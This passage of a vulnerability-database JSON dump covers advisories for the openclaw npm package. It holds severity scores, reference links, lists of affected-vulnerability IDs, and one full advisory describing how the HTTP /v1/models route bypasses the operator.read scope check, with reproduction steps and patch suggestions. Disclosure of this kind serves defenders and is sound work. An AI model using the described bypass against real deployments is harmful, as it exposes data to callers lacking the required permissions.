reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35643", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14446", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14485", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14482", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35643" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:53:53Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/8b02ef133275be96d8aac2283100016c8a7f32e5", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:53:53Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/8b02ef133275be96d8aac2283100016c8a7f32e5" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cxmw-p77q-wchg", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:53:53Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cxmw-p77q-wchg" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35643", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35643" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-unvalidated-webview-javascriptinterface", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:53:53Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-unvalidated-webview-javascriptinterface" }, { "reference_url": "https://github.com/advisories/GHSA-cxmw-p77q-wchg", "reference_id": "GHSA-cxmw-p77q-wchg", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cxmw-p77q-wchg" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api", "purl": "pkg:npm/openclaw@2026.3.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-8z7r-a8dv-eueb" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-jtxm-z4vv-cqg7" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v1bp-hw9a-yffz" }, { "vulnerability": "VCID-v91b-1nmx-ckcx" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wut7-y72y-9ucb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22" } ], "aliases": [ "CVE-2026-35643", "GHSA-cxmw-p77q-wchg" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-nf6w-v1pc-mbe5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90846?format=api", "vulnerability_id": "VCID-nfva-pukn-uqch", "summary": "OpenClaw has a Gateway HTTP /v1/models Route Bypasses Operator Read Scope\n> Fixed in OpenClaw 2026.3.24, the current shipping release.\n\n## Summary\n\nThe OpenAI-compatible HTTP endpoint `/v1/models` accepts bearer auth but does not enforce operator method scopes.\n\nIn contrast, the WebSocket RPC path enforces `operator.read` for `models.list`.\n\nA caller connected with `operator.approvals` (no read scope) is rejected for `models.list` (`missing scope: operator.read`) but can still enumerate model metadata through HTTP `/v1/models`.\n\nConfirmed on current `main` at commit `06de515b6c42816b62ec752e1c221cab67b38501`.\n\n## Details\n\nThe WS control-plane path enforces role/scope checks centrally before dispatching methods. For non-admin operators, this includes required method scopes such as `operator.read` for `models.list`.\n\nThe HTTP compatibility path for `/v1/models` performs bearer authorization and then returns model metadata; it does not apply an equivalent scope check.\n\nAs reproduced, a caller with only `operator.approvals` can:\n\n1. connect successfully,\n2. fail `models.list` over WS with `missing scope: operator.read`,\n3. fetch `/v1/models` over HTTP with status 200 and model data.\n\nThis is a cross-surface authorization inconsistency where the stricter WS policy can be bypassed via HTTP.\n\n## Impact\n\n- Callers lacking `operator.read` can still enumerate gateway model metadata through HTTP compatibility routes.\n- Breaks scope model consistency between WS RPC and HTTP surfaces.\n- Weakens least-privilege expectations for operators granted non-read scopes.\n\n## Patch Suggestion\n\n### 1) Enforce read scope on `/v1/models` routes\n\nApply a scope gate equivalent to `models.list` before serving `/v1/models` or `/v1/models/:id`.\n\n### 2) Reuse centralized scope-authorization helper for HTTP compatibility endpoints\n\nUse the same operator scope logic used by WS dispatch (`authorizeOperatorScopesForMethod(...)`) to prevent policy drift.\n\n### 3) Add regression tests\n\nKeep this PoC and add explicit negative/positive controls:\n\n- `operator.approvals` without read is rejected on HTTP `/v1/models`.\n- `operator.read` is accepted on both WS `models.list` and HTTP `/v1/models`.\n\n## Credit\n\nReported by @zpbrent.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35619", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11019", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.10977", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11011", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35619" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/06de515b6c42816b62ec752e1c221cab67b38501", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:05:44Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/06de515b6c42816b62ec752e1c221cab67b38501" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-68f8-9mhj-h2mp", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:05:44Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-68f8-9mhj-h2mp" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35619", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35619" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-http-v1-models-endpoint", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:05:44Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-http-v1-models-endpoint" }, { "reference_url": "https://github.com/advisories/GHSA-68f8-9mhj-h2mp", "reference_id": "GHSA-68f8-9mhj-h2mp", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-68f8-9mhj-h2mp" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110567?format=api", "purl": "pkg:npm/openclaw@2026.3.24", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5dj5-mk23-kyds" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-66nc-bn98-nbas" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-acy1-83py-efhr" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, 